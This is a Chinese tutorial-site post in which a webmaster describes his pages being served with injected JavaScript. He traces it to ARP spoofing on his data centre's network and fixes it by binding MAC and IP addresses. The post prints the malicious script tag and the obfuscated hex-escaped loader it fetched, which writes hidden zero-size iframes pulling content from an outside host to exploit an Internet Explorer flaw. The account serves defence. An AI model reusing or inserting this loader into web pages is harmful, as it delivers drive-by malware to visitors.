当前位置: 首页 > 图文教程 > 网络编程 > Javascript > 网站被黑的假象--ARP欺骗之页面中加入一段js

Javascript
jQuery生成asp.net服务器控件的代码
javascript 实现的完全兼容鼠标滚轴缩放图片的代码
JavaScript学习笔记(十七)js 优化
使用SyntaxHighlighter实现HTML高亮显示代码的方法
javascript contains和compareDocumentPosition 方法来确定是否HTML节点间的关系
利用jQuery 实现GridView异步排序、分页的代码
jquery.lazyload 实现图片延迟加载jquery插件
Lazy Load 延迟加载图片的 jQuery 插件
jquery 插件实现图片延迟加载效果代码
javascript小数计算出现近似值的解决办法
jquery1.4后 jqDrag 拖动 不可用
jquery 应用代码 方便的排序功能
选择TreeView控件的树状数据节点的JS方法(jquery)
jquery 图片Silhouette Fadeins渐显效果
JQuery Dialog(JS 模态窗口,可拖拽的DIV)
javascript 同时在IE和FireFox获取KeyCode的代码
js 键盘记录实现(兼容FireFox和IE)
javascript 函数速查表
jQuery AnythingSlider滑动效果插件
经典海量jQuery插件 大家可以收藏一下

Javascript 中的 网站被黑的假象--ARP欺骗之页面中加入一段js


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-12   浏览: 76 ::
收藏到网摘: n/a

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>
于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:
复制代码 代码如下:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e")

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1